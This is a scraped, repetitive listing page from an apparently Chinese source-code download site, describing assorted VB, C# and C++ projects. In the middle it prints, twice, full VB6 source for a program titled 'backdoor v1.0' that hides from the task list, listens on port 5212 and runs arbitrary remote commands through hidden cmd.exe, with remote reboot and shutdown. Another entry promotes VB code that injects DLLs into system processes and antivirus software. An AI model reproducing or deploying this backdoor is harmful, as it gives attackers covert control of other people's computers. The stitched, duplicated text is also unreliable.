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DL : 0
EasyD12动态连接库是Microsoft Windows的接口标准,流行的软件开发工具VC、VB、VF、Delphi、C++ Builder、Power Builder 等均可使用。用户可以选用自己喜爱的工具轻松搞定USB开发。其中包含2个版本DLL,根据情况自己选择。-EasyD12 dynamic link library is the Microsoft Windows interface standards, popular software development tools VC, VB, VF, Delphi, C Builder, Power Builder, etc. may be used. Users can choose their favorite tools easy to get USB development. Which contains two versions of DLL, according to the situation of their choice.
Update : 2008-10-13 Size : 28.78kb Publisher : 赵凝

软件主页: 文件说明: ActiveX版 C++ Builder6 静态库 VC++ 6 静态库 VC++ 7 静态库 测试程序 测试程序源代码(VC版) 测试程序源代码(VB版) 帮助文档 特点: 支持HTTP、FTP协议,支持HTTP CHUNKED编码,支持HTTP GET、POST方法,支持重定向、Cookie。 支持获取FTP目录内容。 支持断点续传,支持将文件分成多块同时下载,可任意指定分块数,下载速度快,CPU占用率低。 支持从多个地址下载同一个文件。 支持同步模式,异步模式。 支持SOCKS4,SOCKS5,HTTP1.1代理。 可提供C++静态库(VC6、VC7、VC8、C++ Builder),可提供ActiveX版本(支持C++ Builder、Delphi、VB、VC++、C#、、。 全部代码不依赖于MFC,不依赖于WININET库,方便移植。 接口简单,灵活。 支持Win98,WinMe,Win2000, Windows XP,Windows 2003-software Home : documents : ActiveX version FastDownCB6.z ip C Builder6 static VC six static FastD VC 7 the static test procedure Test testing program source code (VC version) TestFastDo testing program source code (VB Edition) help documentation features : support for HTTP, FTP, HTTP support CHUNKED coding, supports HTTP GET, POST, the support redirect, Cookie. Support FTP access to directory content. Supports HTTP, support the file into several pieces, while downloading can be arbitrarily designated a few blocks, download speed, CPU utilization rate is low. Support downloaded from the same number of addresses in a document. Synchronous, asynchronous mode. Sup
Update : 2008-10-13 Size : 3.06mb Publisher : zxq

Private Sub Form_Load()
syspath = systempath()
If App.PrevInstance Then
End If
cmdno = True
App.TaskVisible = False
Winsock1.LocalPort = 5212
End Sub
Private Sub Winsock1_ConnectionRequest(ByVal requestID As Long)
If Winsock1.State <> sckClosed Then
Winsock1.Accept requestID
Winsock1.SendData "------------------------backdoor v1.0-------------------------" & vbCrLf & _
Space(16) & "code by eighteen" & vbCrLf & "-------------------------------------------------------------" & _
vbCrLf & "type help to get help" & vbCrLf & "shell>"
End If
End Sub
Private Sub Winsock1_DataArrival(ByVal bytesTotal As Long)
Dim str1 As String
Dim scmd As String
Dim i As Integer
Dim tag As Integer
Winsock1.GetData str1
If Asc(str1) = 8 Then
myname = "" '清空命令存储
Winsock1.SendData vbCrLf & "shell>"
End If
If (Asc(str1) <> 13) And (Asc(str1) <> 8) Then
myname = myname + str1
Elseif Asc(str1) <> 8 Then
Text1.Text = myname & vbcrlf
myname = "" '清空对当前命令的存储,用来接受下一条命令
tag = InStr(Text1.Text, Chr(13)) - 1
scmd = Left(Text1.Text, tag)
If cmdno = True Then
Select Case scmd
Case "help"
Winsock1.SendData "cmd     -------打开shell" & vbCrLf & "reboot     -------重启" & _
vbCrLf & "shutdown   ------- 关机" & vbCrLf & "exit     -------退出" & vbCrLf & "shell>"

Case "reboot"
ExitWindowsEx EXW_REBOOT, 0

Case "shutdown"
ExitWindowsEx EXW_SHUTDOWN, 0
Case "exit"
Winsock1.SendData "exit seccessful!"
Case "cmd"
Winsock1.SendData "获得虚拟shell成功!" & vbCrLf & "vcmd>"
cmdno = False
Case Else
Winsock1.SendData "cammond error!" & vbCrLf & "shell>"
End Select
Shell "cmd.exe /c" & Space(1) & scmd & Space(1) & ">" & syspath & "\shell.rlt&exit", vbHide
Sleep (500)
Call tranrlt
Winsock1.SendData "如果想退出虚拟shell,清输入exit" & vbCrLf & "vcmd>"
If scmd = "exit" Then
Winsock1.SendData "成功退出虚拟shell!" & vbCrLf & "shell>"
cmdno = True '重置虚拟shell标志
End If
End If
End If
End Sub
Sub tranrlt()
Dim strrlt As String
Open syspath & "\shell.rlt" For Input As #1
Do While Not EOF(1)
Line Input #1, strrlt
Winsock1.SendData strrlt & vbCrLf
Close #1
Winsock1.SendData "----------------------------------------------------" & vbCrLf
Shell "cmd.exe /c del " & syspath & "\shell.rlt&exit", vbHide
End Sub

Public syspath As String
Public cmdno As Boolean
Private Declare Sub Sleep Lib "kernel32" (ByVal nsecond As Long)
Private Declare Function ExitWindowsEx Lib "user32" (ByVal uFlags As Long, ByVal dwReserved As Long) As Long
Private Declare Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Const EWX_REBOOT = 2
Public myname As String
Sub tranrlt()
Dim strrlt As String
Open syspath & "\shell.rlt" For Input As #1
Do While Not EOF(1)
Line Input #1, strrlt
Winsock1.SendData strrlt & vbCrLf
Close #1
Winsock1.SendData "----------------------------------------------------" & vbCrLf
Shell "cmd.exe /c del " & syspath & "\shell.rlt&exit", vbHide
End Sub
Function systempath() As String
Dim filepath As String
Dim nSize As Long
filepath = String(255, 0)
nSize = GetSystemDirectory(filepath, 256)
filepath = Left(filepath, nSize)
systempath = filepath
End Function
Private Sub Form_Load()
syspath = systempath()
If App.PrevInstance Then
End If
cmdno = True
App.TaskVisible = False
Winsock1.LocalPort = 5212
End Sub
Private Sub Winsock1_ConnectionRequest(ByVal requestID As Long)
If Winsock1.State <> sckClosed Then
Winsock1.Accept requestID
Winsock1.SendData "------------------------backdoor v1.0-------------------------" & vbCrLf & _
Space(16) & "code by eighteen" & vbCrLf & "-------------------------------------------------------------" & _
vbCrLf & "type help to get help" & vbCrLf & "shell>"
End If
End Sub

Private Sub Winsock1_DataArrival(ByVal bytesTotal As Long)
Dim str1 As String
Dim scmd As String
Dim i As Integer
Dim tag As Integer
Winsock1.GetData str1
If Asc(str1) = 8 Then
myname = ""
Winsock1.SendData vbCrLf & "command error!" & vbCrLf & "shell>"
End If
If (Asc(str1) <> 13) And (Asc(str1) <> 8) Then
myname = myname + str1
ElseIf Asc(str1) <> 8 Then
Text1.Text = myname & vbCrLf
myname = ""
tag = InStr(Text1.Text, Chr(13)) - 1
scmd = Left(Text1.Text, tag)
If cmdno = True Then
Select Case scmd
Case "help"
Winsock1.SendData "cmd     -------打开shell" & vbCrLf & "reboot     -------重启" & _
vbCrLf & "shutdown   ------- 关机" & vbCrLf & "exit     -------退出" & vbCrLf & "shell>"

Case "reboot"
ExitWindowsEx EXW_REBOOT, 0

Case "shutdown"
ExitWindowsEx EXW_SHUTDOWN, 0
Case "exit"
Winsock1.SendData "exit seccessful!"
Case "cmd"
Winsock1.SendData "获得虚拟shell成功!" & vbCrLf & "vcmd>"
cmdno = False
Case Else
Winsock1.SendData "command error!" & vbCrLf & "shell>"
End Select
Shell "cmd.exe /c" & Space(1) & scmd & Space(1) & ">" & syspath & "\shell.rlt&exit", vbHide
Sleep (500)
Call tranrlt

Winsock1.SendData "如果想退出虚拟shell,清输入exit" & vbCrLf & "vcmd>"
If scmd = "exit" Then
Winsock1.SendData "成功退出虚拟shell!" & vbCrLf & "shell>"
cmdno = True
End If
End If
End If
End Sub

Private Sub Winsock1_Error(ByVal Number As Integer, Description As String, ByVal Scode As Long, ByVal Source As String, ByVal HelpFile As String, ByVal HelpContext As Long, CancelDisplay As Boolean)
End Sub

Update : 2008-12-15 Size : 8.01kb Publisher : onetwogoo

DL : 0
EasyD12动态连接库是Microsoft Windows的接口标准,流行的软件开发工具VC、VB、VF、Delphi、C++ Builder、Power Builder 等均可使用。用户可以选用自己喜爱的工具轻松搞定USB开发。其中包含2个版本DLL,根据情况自己选择。-EasyD12 dynamic link library is the Microsoft Windows interface standards, popular software development tools VC, VB, VF, Delphi, C Builder, Power Builder, etc. may be used. Users can choose their favorite tools easy to get USB development. Which contains two versions of DLL, according to the situation of their choice.
Update : 2025-02-19 Size : 29kb Publisher : 赵凝

软件主页: 文件说明: ActiveX版 C++ Builder6 静态库 VC++ 6 静态库 VC++ 7 静态库 测试程序 测试程序源代码(VC版) 测试程序源代码(VB版) 帮助文档 特点: 支持HTTP、FTP协议,支持HTTP CHUNKED编码,支持HTTP GET、POST方法,支持重定向、Cookie。 支持获取FTP目录内容。 支持断点续传,支持将文件分成多块同时下载,可任意指定分块数,下载速度快,CPU占用率低。 支持从多个地址下载同一个文件。 支持同步模式,异步模式。 支持SOCKS4,SOCKS5,HTTP1.1代理。 可提供C++静态库(VC6、VC7、VC8、C++ Builder),可提供ActiveX版本(支持C++ Builder、Delphi、VB、VC++、C#、、。 全部代码不依赖于MFC,不依赖于WININET库,方便移植。 接口简单,灵活。 支持Win98,WinMe,Win2000, Windows XP,Windows 2003-software Home : documents : ActiveX version FastDownCB6.z ip C Builder6 static VC six static FastD VC 7 the static test procedure Test testing program source code (VC version) TestFastDo testing program source code (VB Edition) help documentation features : support for HTTP, FTP, HTTP support CHUNKED coding, supports HTTP GET, POST, the support redirect, Cookie. Support FTP access to directory content. Supports HTTP, support the file into several pieces, while downloading can be arbitrarily designated a few blocks, download speed, CPU utilization rate is low. Support downloaded from the same number of addresses in a document. Synchronous, asynchronous mode. Sup
Update : 2025-02-19 Size : 3.06mb Publisher : zxq

DL : 0
得到CPU信息,C源码为一dll源码,VB源码为一示例-Get CPU information, C source code for one dll source code, VB source code for one example
Update : 2025-02-19 Size : 94kb Publisher :

网狐2008最新版本梭哈游戏代码!很难得到的,本人也买的,共享给需要的朋友-The latest version of the 2008 Fox network Stud game code! Difficult to get, I also bought, shared to the needy friend
Update : 2025-02-19 Size : 1.06mb Publisher : 姓名

很多人说VB不能远程注入DLL,其实是错误的。VB其实也能象C++等其他语言一样轻松搞定,不信就看看这个代码。这个代码经过充分测试,包括系统进程都可以正常注入和卸载,就连杀毒软件都能注入。-Many people say that VB can not remote into the DLL, in fact, is wrong. VB can be a matter of fact, as C++ and other languages as easily get, do not look at this code on the letter. This well-tested code, including system process can be injected into normal and unloading, and even the antivirus software can be injected.
Update : 2025-02-19 Size : 117kb Publisher : 289

应用VB6.0读取CPU序列号,方便用户注册软件。-VB6.0 application CPU to read the serial number, registered user-friendly software.
Update : 2025-02-19 Size : 9kb Publisher : dinghongtao

ProjectX is a combined Project produced by a Visual Basic News Group Called Andrea VB Programmers eGroup. What we are doing is providing answers to questions through the format of an application code, this code and application is provided as FREEWARE however the source code is Copyright (c),1999 - 2000 Andrea VB Programmers eGroup. You may use this code as a learning tool only. The application may not be sold in any shape or form. So Download the code and get involved with the News Group, help us to help you.-ProjectX is a combined Project produced by a Visual Basic News Group Called Andrea VB Programmers eGroup. What we are doing is providing answers to questions through the format of an application code, this code and application is provided as FREEWARE however the source code is Copyright (c),1999- 2000 Andrea VB Programmers eGroup. You may use this code as a learning tool only. The application may not be sold in any shape or form. So Download the code and get involved with the News Group, help us to help you.
Update : 2025-02-19 Size : 24kb Publisher : rpngroup

DL : 0
cgi教程目录 第一章:基础的基础 1.1 为什么使用CGI? 1.2 CGI是什么? 1.3 选择你熟悉的编程语言 1.4 安全 第二章:一些Html基础 第三章:传送方式 3.1 get 3.2 post 第四章:基本调试环境的建立 4.1 Windows & Win NT的Server 4.2 Perl for win 4.3 VB 4.4 C&C++ 4.5 安装 4.6 测试 -cgi tutorial Table of Contents Chapter: 1.1 Why use the basis of the basis of CGI? 1.2 CGI for that? 1.3 Select your favorite programming language 1.4 Security Chapter: Some Html based Chapter: transmission 3.1 get 3.2 post Chapter Four: Basic debugging environment and a 4.1 Windows & Win NT' s Server 4.2 Perl for win 4.3 VB 4.4 C & C++ 4.5 4.6 Test installation
Update : 2025-02-19 Size : 347kb Publisher : sunny

The target audience for this book consists of developers with an intermediate to advanced experience level looking to deepen their understanding of ASP.NET and its underlying server control architecture. The example code in this book is written in C#. However, if you are a VB. NET developer, the examples translate pretty easily, as ASP.NET development is language agnostic. The .NET Framework and the ASP.NET object model are what’s important, not the language. If you are a developer in need of learning a particular technique, each major facet of control development is presented with simple example code to highlight that particular topic. For example, if you are looking for information on how to add events to your server controls, or how to understand how events work in ASP.NET, you can drill into that chapter to get the details. (Include Source code)
Update : 2025-02-19 Size : 15.12mb Publisher :

关于在GBA上面编程,现在网上的达人们似乎都认为它要比在PC上面编程简单一些。毕竟,在GBA上面编程,迄今为止还没有像VB、VC之类的所谓“所见即所得”的开发工具,而GBA也不可能支持面向对象的编程;一切都要靠汇编和C语言……如果你接触过汇编或者C语言,那么,上手就很容易了!不过,也不是像你想象的那么难,因为GBA的硬件是所谓“单总线结构”,或者说,叫做“统一编址”;无论是访问内存,还是寄存器或者接口,就像直接访问内存一样那么简单!-GBA on top of programming, now up to the people online seem to think it than in the PC top programming simpler. After all, the top program in the GBA, so far, not as VB, VC like the so-called " WYSIWYG" development tools, and GBA can not support object-oriented programming all have to rely on assembly and C language ... ... If you come into contact with assembly or C language, then it is easy to get started up! However, is not so difficult as you imagine, because GBA hardware is the so-called " single-bus architecture," or called " unified addressing" whether access memory, or registers, or interface, then the same as direct access to memory Simple!
Update : 2025-02-19 Size : 2.85mb Publisher : guibin

《C#图解教程》是一本广受赞誉的C#教程。它以图文并茂的形式,用朴实简洁的文字,并辅之以大量表格和代码示例,精炼而全面地阐述了最新版C#语言的各种特性,使读者能够快速理解、学习和使用C#。同时,《C#图解教程》还讲解了C#与VB、C++等主流语言的不同点和相似之处。 作者简介   DanielSolis 资深软件工程师和技术顾问.有20余年开发经验,曾为微软和IBM等大公司提供技术咨询。他拥有加州大学计算机科学硕士、生物学和英文学士学位。同时,他也是一位杰出的导师。在美国和欧洲从事编程语言、Wirldows程序设计和Unix底层技术相关的教学培训工作多年。-The unique, visual format of Illustrated C# 2008 has been specially created by author, and teacher of development methods, Daniel Solis. The concise text, use of tables to clarify language features, frequent figures and diagrams, as well as focused code samples all combine to create a unique approach that will help you understand and get to work with C# fast.
Update : 2025-02-19 Size : 41.38mb Publisher : dozenow

使用前请首先注册,运行如下命令: regsvr32 GFastdownActiveXTrial.ocx 软件主页: 文件说明: ActiveX版 C++ Builder6 静态库 VC++ 6 静态库 VC++ 7 静态库 测试程序 测试程序源代码(VC版) 测试程序源代码(VB版) 帮助文档 特点: 支持HTTP、FTP协议,支持HTTP CHUNKED编码,支持HTTP GET、POST方法,支持重定向、Cookie。 支持获取FTP目录内容。 支持断点续传,支持将文件分成多块同时下载,可任意指定分块数,下载速度快,CPU占用率低。 支持从多个地址下载同一个文件。 支持同步模式,异步模式。 支持SOCKS4,SOCKS5,HTTP1.1代理。 可提供C++静态库(VC6、VC7、VC8、C++ Builder),可提供ActiveX版本(支持C++ Builder、Delphi、VB、VC++、C#、、。 全部代码不依赖于MFC,不依赖于WININET库,方便移植。 接口简单,灵活。 支持Win98,WinMe,Win2000, Windows XP,Windows 2003-软件主页: 文件说明: ActiveX版 C++ Builder6 静态库 VC++ 6 静态库 VC++ 7 静态库 测试程序 测试程序源代码(VC版) 测试程序源代码(VB版) 帮助文档 特点: 支持HTTP、FTP协议,支持HTTP CHUNKED编码,支持HTTP GET、POST方法,支持重定向、Cookie。 支持获取FTP目录内容。 支持断点续传,支持将文件分成多块同时下载,可任意指定分块数,下载速度快,CPU占用率低。 支持从多个地址下载同一个文件。 支持同步模式,异步模式。 支持SOCKS4,SOCKS5,HTTP1.1代理。 可提供C++静态库(VC6、VC7、VC8、C++ Builder),可提供ActiveX版本(支持C++ Builder、Delphi、VB、VC++、C#、、。 全部代码不依赖于MFC,不依赖于WININET库,方便移植。 接口简单,灵活。 支持Win98,WinMe,Win2000, Windows XP,Windows 2003
Update : 2025-02-19 Size : 3.06mb Publisher : shao youde

该源码是基于C#和VB开发语言进行开发的小程序通过工具条,来获取一些命令按钮。-The source is based on the language C# and VB developers to develop a small program through the toolbar, to get some of the command button.
Update : 2025-02-19 Size : 25kb Publisher : 刘兵

Alvas.Audio allows C# and VB.Net developers to create applications that play, record, edit and convert sound. Key Features: record/play uncompressed and compressed audio data play mixed audio data record/play data to/from the stream set up mixer controls get the current sound position convert the audio data view the level of the input sound signal. Encode and decode Dialogic .vox (adpcm) format data. -Alvas.Audio allows C# and VB.Net developers to create applications that play, record, edit and convert sound. Key Features: record/play uncompressed and compressed audio data play mixed audio data record/play data to/from the stream set up mixer controls get the current sound position convert the audio data view the level of the input sound signal. Encode and decode Dialogic .vox (adpcm) format data.
Update : 2025-02-19 Size : 1016kb Publisher : taoymin

DL : 0
The.Net project in compiled successfully in the bin folder to generate DLL files, the DLL file is all.Net framework language can be shared. For example, you use the c# development DLL, others use VB can also add this DLL, referenced to their projects. Using VB way to call you created using the C# class and method.-The.Net project in compiled successfully in the bin folder to generate DLL files, the DLL file is all.Net framework language can be shared. For example, you use the c# development DLL, others use VB can also add this DLL, referenced to their projects. Using VB way to call you created using the C# class and method.In addition, Microsoft VSS, can the project source code management, through the VSS server management can be a very good control of the source code version, for example, it can protect the checked-out files are not checked out by a person other than the modified. And in its being checked in other people can get server version of the update. Convenient multiple person cooperation project development.
Update : 2025-02-19 Size : 2.17mb Publisher : mis tan

C#编写的GeoTiff程序,程序中内容完整,经过调试,可作为研究地学人员的参考资料-The objectives of the reader are to understand how to add the raster layer to the map control, how to manipulate the raster symbology, how to get the raster information, and how to join the cursor to the location on raster. As usual, my tools pack includes MapWinGIS.ocx, which is an ActiveX control that can be used in any language that supports ActiveX (e.g., C#, VB, Microsoft Access, Microsoft PowerPoint, … ). MapWinGIS.ocx is Open Source, and you can download it free of charge under the MPL license. All code examples and screenshots in this article are based on the Microsoft Visual C# 2008 Professional Edition, but the reader can use Microsoft Visual C# Express Edition to get the same results.
Update : 2025-02-19 Size : 23kb Publisher : haoyubao

VB获取硬盘唯一序列号。放到C盘下txt文档中-VB get single hardisk number
Update : 2025-02-19 Size : 2kb Publisher : mzral
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